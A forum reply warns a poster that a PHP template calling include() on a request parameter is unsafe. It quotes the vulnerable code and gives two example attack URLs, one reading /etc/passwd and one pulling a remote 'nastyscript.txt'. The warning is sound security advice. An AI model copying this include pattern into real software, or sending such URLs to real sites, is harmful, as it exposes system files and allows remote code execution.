Quote:
|
Originally Posted by saul
I figure I can instead have a generic template that can include and populate any form, heck, the form name itselft can also be a dynamic entity passed in the request:
<?php
...scpeial code to populate form....
include($_REQUEST['query_form_filename']);
?>
|
Not a good idea since it opens holes in your application.
index.php?query_form_filename=/etc/passwd or index.php?query_form_filename=http://host/nastyscript.txt for example.